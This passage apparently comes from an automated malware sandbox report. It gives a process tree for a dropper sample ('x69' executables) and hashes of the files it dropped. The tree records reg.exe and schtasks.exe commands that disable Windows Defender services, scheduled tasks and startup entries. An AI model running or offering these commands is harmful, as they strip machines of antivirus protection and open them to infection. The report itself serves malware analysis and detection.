                                                                                                                                                      5⤵
                                                                                                                                                        PID:1696
                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                        reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                                                                                                        5⤵
                                                                                                                                                          PID:4084
                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                          schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                                                                                                                                                          5⤵
                                                                                                                                                            PID:2080
                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                            schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                                                                                                                                                            5⤵
                                                                                                                                                              PID:3196
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                                                                                                                                              5⤵
                                                                                                                                                                PID:4864
                                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                                schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                                                                                                                                                5⤵
                                                                                                                                                                  PID:1404
                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                  schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                                                                                                                                                  5⤵
                                                                                                                                                                    PID:5388
                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                    reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
                                                                                                                                                                    5⤵
                                                                                                                                                                      PID:2040
                                                                                                                                                                    • C:\Windows\system32\reg.exe
          reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
          5⤵
          PID:1344
        • C:\Windows\system32\reg.exe
          reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
          5⤵
          PID:4612
        • C:\Windows\system32\reg.exe
          reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
          5⤵
          PID:4888
        • C:\Windows\system32\reg.exe
          reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
          5⤵
          PID:3308
        • C:\Windows\system32\reg.exe
          reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
          5⤵
          • Modifies Security services
          PID:2864
        • C:\Windows\system32\reg.exe
          reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
          5⤵
          • Modifies Security services
          PID:1148
        • C:\Windows\system32\reg.exe
          reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
          5⤵
          • Modifies Security services
          PID:6136
        • C:\Windows\system32\reg.exe
          reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
          5⤵
          • Modifies Security services
          PID:1140
        • C:\Windows\system32\reg.exe
          reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
          5⤵
          • Modifies security service
          PID:3596
  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\x69install.exe
    2⤵
    • Suspicious use of WriteProcessMemory
    PID:4492
    • C:\Users\Admin\AppData\Roaming\x69install.exe
      C:\Users\Admin\AppData\Roaming\x69install.exe
      3⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:5056
• C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
  1⤵
  PID:3524
• C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
  1⤵
  PID:3688
• C:\Windows\system32\DllHost.exe
  C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
  1⤵
  PID:3892
• C:\Windows\System32\RuntimeBroker.exe
  C:\Windows\System32\RuntimeBroker.exe -Embedding
  1⤵
  • Modifies registry class
  PID:4048
• C:\Windows\System32\RuntimeBroker.exe
  C:\Windows\System32\RuntimeBroker.exe -Embedding
  1⤵
  • Suspicious use of UnmapMainImage
  PID:4104
• C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
  1⤵
  PID:4480
• C:\Windows\System32\RuntimeBroker.exe
  C:\Windows\System32\RuntimeBroker.exe -Embedding
  1⤵
  • Suspicious use of UnmapMainImage
  PID:5320
• C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
  1⤵
  PID:5940
• C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k netsvcs -p
  1⤵
  PID:3744
• C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
  1⤵
  PID:692
• C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
  1⤵
  • Modifies data under HKEY_USERS
  PID:1932
• C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
  "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
  1⤵
  • Drops file in System32 directory
  • Modifies data under HKEY_USERS
  PID:1428
• C:\Windows\system32\SppExtComObj.exe
  C:\Windows\system32\SppExtComObj.exe -Embedding
  1⤵
  PID:3084
• C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
  1⤵
  PID:3732
• C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
  1⤵
  PID:4988
• C:\Windows\system32\DllHost.exe
  C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
  1⤵
  PID:2132
• C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
  1⤵
  PID:2624
• C:\Windows\System32\RuntimeBroker.exe
  C:\Windows\System32\RuntimeBroker.exe -Embedding
  1⤵
  • Modifies registry class
  PID:5936
• C:\Windows\System32\RuntimeBroker.exe
  C:\Windows\System32\RuntimeBroker.exe -Embedding
  1⤵
  PID:5516
• C:\Windows\system32\wbem\wmiprvse.exe
  C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
  1⤵
  • Checks BIOS information in registry
  • Checks SCSI registry key(s)
  • Enumerates system info in registry
  PID:4900
• C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
  1⤵
  PID:2224
• C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
  1⤵
  PID:4508
• C:\Windows\servicing\TrustedInstaller.exe
  C:\Windows\servicing\TrustedInstaller.exe
  1⤵
  PID:5160
• C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
  1⤵
  PID:5496
• C:\Windows\System32\mousocoreworker.exe
  C:\Windows\System32\mousocoreworker.exe -Embedding
  1⤵
  • Checks processor information in registry
  • Enumerates system info in registry
  PID:5840
• C:\Windows\System32\sihclient.exe
  C:\Windows\System32\sihclient.exe /cv RW6r/1UbQk6YVFazm0WaLg.0.2
  1⤵
  PID:3308
• C:\Windows\system32\backgroundTaskHost.exe
  "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
  1⤵
  PID:5740
• C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
  C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                              PID:5196
                                                                                                                                                                                                            • C:\Windows\system32\BackgroundTransferHost.exe
                                                                                                                                                                                                              "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                PID:3336

Network

MITRE ATT&CK Enterprise v16

Downloads

• C:\Program Files\7-Zip\Uninstall.exe
  Filesize: 31KB
  MD5: 705b1e1d10ed605f971072b7500c2c74
  SHA1: 0cc9665bf92cc460af6cd9ddac4357e98c5b20d7
  SHA256: bfaf283ef17bb75e1549787d1dd5ef0914cd89c922ef7ab511a26395672c768f
  SHA512: ac08b36a38aaa3583785cd616de252cd102556158e32c14aa8a5362fe05aaa4427f330bffedb63b9e7460f6cb6510749474f940f055bc277bbd9d56703952c4d

• C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  Filesize: 2KB
  MD5: d85ba6ff808d9e5444a4b369f5bc2730
  SHA1: 31aa9d96590fff6981b315e0b391b575e4c0804a
  SHA256: 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
  SHA512: 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

• C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\x69.exe.log
  Filesize: 654B
  MD5: 2ff39f6c7249774be85fd60a8f9a245e
  SHA1: 684ff36b31aedc1e587c8496c02722c6698c1c4e
  SHA256: e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
  SHA512: 1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 944B
  MD5: 3bfbee2fc19a81c886b0618e7f03dac9
  SHA1: 2bf1d96d0a8df779a664d3fe7d64af1320d6f318
  SHA256: 70bb358b8e112c86a0d33df171fccc9889a0b82fead302b77d7aff27342db2e4
  SHA512: 1ab625306ad6a26a2cf9e430231a3e3070f73093572794f601ebcbd27ed9f5955b5b777476296c670467f58b3ac0439298cee74342bb14a4dbde726208f0892f

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 944B
  MD5: 0fd3f36f28a947bdd05f1e05acf24489
  SHA1: cf12e091a80740df2201c5b47049dd231c530ad3
  SHA256: d36c21211f297a74a801881707690fa7a0a0a31addd3c7ba1522275b8848ab50
  SHA512: 5f132308b06e621aace1091f523649bcb5d1823b478691799791f4154cb96b9897f563eed8ad8db4a03714d815246479372e0920c659eb3fd9006271e58429ee

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 944B
  MD5: aeceee3981c528bdc5e1c635b65d223d
  SHA1: de9939ed37edca6772f5cdd29f6a973b36b7d31b
  SHA256: b99f3c778a047e0348c92c16e0419fa29418d10d0fec61ad8283e92a094a2b32
  SHA512: df48285f38e9284efdbd9f8d99e2e94a46fb5465953421ab88497b73ae06895b98ea5c98796560810a6f342c31a9112ea87e03cd3e267fd8518d7585f492a8fb

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 944B
  MD5: 0256bd284691ed0fc502ef3c8a7e58dc
  SHA1: dcdf69dc8ca8bf068f65d20ef1563bbe283e2413
  SHA256: e2fb83098e114084f51ed7187334f861ce670051046c39f338928296ca9a49cf
  SHA512: c5b29c1e0a15ddb68b0579848066774fa7cdc6f35087bbbf47c05a5c0dcc1eb3e61b2ddadfbded8c1ed9820e637596a9f08a97db8fb18000d168e6b159060c42

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 944B
  MD5: eee38c85d7378e574dc4ac9ad2c1f373
  SHA1: 149613a5500c6285de44192d2703b43da1405933
  SHA256: 7ff262eeb7e01ef44afebdf869a2925d9c140e0a84867370c6bfb3dc6c272fd2
  SHA512: dde1d7845e156a532796ab9c9616a0cf770bf66a3511c4faa93c6df7e0288a67381978688e81211ce8c8fe93e1c9c07a8d0e8b656b5aa9aef520c06fdaedac8c

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 944B
  MD5: 34f595487e6bfd1d11c7de88ee50356a
  SHA1: 4caad088c15766cc0fa1f42009260e9a02f953bb
  SHA256: 0f9a4b52e01cb051052228a55d0515911b7ef5a8db3cf925528c746df511424d
  SHA512: 10976c5deaf9fac449e703e852c3b08d099f430de2d7c7b8e2525c35d63e28b890e5aab63feff9b20bca0aaf9f35a3ba411aee3fbeee9ea59f90ed25bd617a0b

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 944B
  MD5: da5c82b0e070047f7377042d08093ff4
  SHA1: 89d05987cd60828cca516c5c40c18935c35e8bd3
  SHA256: 77a94ef8c4258445d538a6006ffadb05afdf888f6f044e1e5466b981a07f16c5
  SHA512: 7360311a3c97b73dd3f6d7179cd979e0e20d69f380d38292447e17e369087d9dd5acb66cd0cbdd95ac4bfb16e5a1b86825f835a8d45b14ea9812102cff59704b

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 944B
  MD5: 04f1d68afbed6b13399edfae1e9b1472
  SHA1: 8bfdcb687a995e4a63a8c32df2c66dc89f91a8b0

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      f358f33a42122e97c489fad7bbc8beab2eb42d42e4ec7fce0dd61fe6d8c0b8de

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      30c5e72a8134992094d937d2588f7a503b1d6407d11afe0265b7c8b0ce14071925e5caed13fc4f9c28705df4c7aed3601f81b007048b148af274d7784aa5fb75

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      944B

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      5cfe303e798d1cc6c1dab341e7265c15

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      cd2834e05191a24e28a100f3f8114d5a7708dc7c

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      c4d16552769ca1762f6867bce85589c645ac3dc490b650083d74f853f898cfab

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      ef151bbe0033a2caf2d40aff74855a3f42c8171e05a11c8ce93c7039d9430482c43fe93d9164ee94839aff253cad774dbf619dde9a8af38773ca66d59ac3400e

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      944B

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      10890cda4b6eab618e926c4118ab0647

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      1e1d63b73a0e6c7575f458b3c7917a9ce5ba776d

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      00f8a035324d39bd62e6dee5e1b480069015471c487ebee4479e6990ea9ddb14

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      a2ee84006c24a36f25e0bca0772430d64e3791f233da916aecdeae6712763e77d55bbbd00dc8f6b2b3887f3c26ab3980b96c5f46cc823e81e28abbbc5fc78221

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      944B

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      a7cc007980e419d553568a106210549a

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      c03099706b75071f36c3962fcc60a22f197711e0

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      a5735921fc72189c8bf577f3911486cf031708dc8d6bc764fe3e593c0a053165

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      b9aaf29403c467daef80a1ae87478afc33b78f4e1ca16189557011bb83cf9b3e29a0f85c69fa209c45201fb28baca47d31756eee07b79c6312c506e8370f7666

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      944B

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      ba169f4dcbbf147fe78ef0061a95e83b

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      92a571a6eef49fff666e0f62a3545bcd1cdcda67

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      5ef1421e19fde4bc03cd825dd7d6c0e7863f85fd8f0aa4a4d4f8d555dc7606d1

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      8d2e5e552210dcda684682538bc964fdd8a8ff5b24cc2cc8af813729f0202191f98eb42d38d2355df17ae620fe401aad6ceaedaed3b112fdacd32485a3a0c07c

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      948B

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      b40af49a7170e7a9cc8c621876782e5a

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      06df1560c9ed162e07956c4a4f61a5e0f794b0af

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      3401996593b95d1ef81bdaa1696e0a9e44d3abbb7139bcaafe5425dc857e07cb

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      5c6b0d20f326e34da759ede694604d1778ea4dd5ee1805c3a6fdc48f33afa5c01600ef12f5b3262522eb5db486614380732466ebbba485c7f7b6ba6b1c33a654

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      948B

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      c1a54dd5a1ab44cc4c4afd42f291c863

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      b77043ab3582680fc96192e9d333a6be0ae0f69d

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      c6dce870a896f3531ae7a10a0c2096d2eb7eb5989ae783aefea6150279502d75

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      010f5093f58b0393d17c824a357513cf4f06239ccddd86c2e0581347ef3b8e7b93f869b0770bdaeb000e4fda7e14f49b9e45663a3839ab049446e9fe08ec535d

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      944B

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      b7e1db446e63a2aae76cd85440a08856

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      c900cc81335dd3ca6337e21f5bcde80f8e8a88f3

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      7305bcde3ba246a9b5c1666079c61596cc2ed2c651a1cd9e20557dba8a78c0e4

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      dd63e28017eec632868489e469dd2ba54f20a3024be44550b729a0384bd55c5aa78171f7416612cd5174047afc544e21678ca164359962312b1d853c9bff04ea

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      948B

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      217d9191dfd67252cef23229676c9eda

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      80d940b01c28e3933b9d68b3e567adc2bac1289f

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      e64811c3e57476bb644539824034cabe2cabcb88941122193e2af328f5eb2133

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      86767aa3c0eec425b7c6dbfd70a4a334fb5b1227c05fb06fbb3845e7b6974008386276f441c8e66e2bf9b0ae0a76133c4e5602211788cd702eaeadd12c5ff757

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      948B

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      083782a87bd50ffc86d70cbc6f04e275

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      0c11bc2b2c2cf33b17fff5e441881131ac1bee31

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      7a54dcc99ebfb850afde560857e2d1f764a53ff09efd03222f56ab547539798f

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      a7e56293e07acce20e69dceb13282e5d1eed2ef972a4c9cf1fb4f973b4b7d6a9ca8714fc547ab662842205383891372a2386fc3a12af3d7e4ef6a195f8a2bf02

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      948B

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      721991167161c45d61b03e4dbad4984b

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      fd3fa85d142b5e8d4906d3e5bfe10c5347958457

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      0a7be18529bdbed6fc9f36118a6147920d31099ee0fb5a2a8b6b934d1b9bcefb

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      f1aa4f8e48eeb5b5279530d8557cb292a08b25ad46af0dd072130c395127f6c064c88b04910c626c13f22462104ac3d36fa0d4064fff0ec7528922df54ecdcf0

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      944B

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      1542328a8546914b4e2f1aef9cb42bea

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      7a0ac5969dfb20eb974e8a3bd8707243fa68f94f

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      7584152ef93be4dc497db509c723f20a1fd09d69df02d62c897eefda6bf4c737

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      b2b117abc97a64a71538d57c7f6c68c405d7ff5ef91dafe768832ff63378cb627af8b035b2a803627754c2219dd26755a2fa28e3a1bb9b1deb32ba13487ee286

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      64B

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      5caad758326454b5788ec35315c4c304

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      3aef8dba8042662a7fcf97e51047dc636b4d4724

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      944B

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      cae60f0ddddac635da71bba775a2c5b4

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      386f1a036af61345a7d303d45f5230e2df817477

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      b2dd636b7b0d3bfe44cef5e1175828b1fa7bd84d5563f54342944156ba996c16

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      28ed8a8bc132ef56971cfd7b517b17cdb74a7f8c247ef6bff232996210075e06aa58a415825a1e038cfb547ad3dc6882bf1ca1b68c5b360ef0512a1440850253

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7b925020.bat

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      189B

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      6b0e04f3f337f6191a602f6d63f877b6

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      3472f1462fb4b6d3787dab46a0a465844c52f1d9

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      3e9c817ecfa55808d36d01e6f7b1f151775ee32b973a8a4c37a156ad82d8870d

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      25f37cc787f155c6df38d5912f1b305712f90cff8ac056d5ad694366211f194a6eb8c39b902f28bf636c489e9219c063ef77dbacc61c6504df573b1b55d23f40

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\8C42.tmp\8C43.tmp\8C44.bat

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      2df9441936169e60a9631bf730cd4273

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      979ee79524023a77b9577d077a3472b87fda9834

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      24ab289fe2d2dd6e86d9862bf5dac0f6c78acc444eb083152b3eaf84e041f95e

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      ab1e894b85c731e9ce84e0cabbab493935bec18e352bd397cf8b3172bb817e9b174069122180d1fc2d9e538864c1cd77fd5c18ce8dd2a45434c9c045f2bf39ee

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5ri5af0s.lz4.ps1

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      60B

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      15KB

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      56b2c3810dba2e939a8bb9fa36d3cf96

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      99ee31cd4b0d6a4b62779da36e0eeecdd80589fc

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      4354970ccc7cd6bb16318f132c34f6a1b3d5c2ea7ff53e1c9271905527f2db07

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      27812a9a034d7bd2ca73b337ae9e0b6dc79c38cfd1a2c6ac9d125d3cc8fa563c401a40d22155811d5054e5baa8cf8c8e7e03925f25fa856a9ba9dea708d15b4e

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\x69.exe

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      68KB

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      143b1a26c0fdda10f74ba1b6249e020a

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      30a01b28f4f205bc594f8d6665963eaa49d172e3

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      83f2f88a1de9b022867ba3659074b0c349e24d2de7d0e01e136a325a5d5eed65

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      06fca2ea01ce1828ae7f08c17d7ae111d75ae5b4c0c01c618a02551300bf25c7ad17abcb078eb0a4082bf74a052fcd3f8f63122251cf5884ec97099f495a9ce0

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      108KB

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      22d6b7ab5c8a05162d36d2981b715c28

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      7adc2e2c90b8dfcee0c34a86ad4d0cac79daf9f3

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      f12428dc9c9f900d671d4135cfda52b7de9bfb6b34c5c336dbf88941db8575e1

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      374564a98cc8d663311cf27186aabf8b1e41f776c00f560c6d1d86758f7b6795b1b81651d414fa59af082e21c4e0fd1c475320e97f8e55942341a155c24138ce

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\x69install.exe

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      181KB

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      b89953da384c6a80b03e5b3abece33c9

